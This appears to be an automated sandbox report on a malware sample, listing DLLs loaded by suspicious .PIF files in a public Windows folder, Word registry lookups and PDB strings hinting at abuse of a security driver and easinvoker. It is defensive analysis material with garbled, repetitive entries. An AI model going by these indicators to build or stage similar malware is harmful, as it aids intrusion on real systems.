Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mscoree.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: version.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasapi32.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasman.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rtutils.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: secur32.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: schannel.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mskeyprotect.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ntasn1.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ncrypt.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ncryptsslp.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dpapi.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: msv1_0.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ntlmshared.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: endpointdlp.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230785597.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2198932373.000000007F410000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.000000000251A000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.2235153147.000000002455F000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2336023047.0000000018834000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 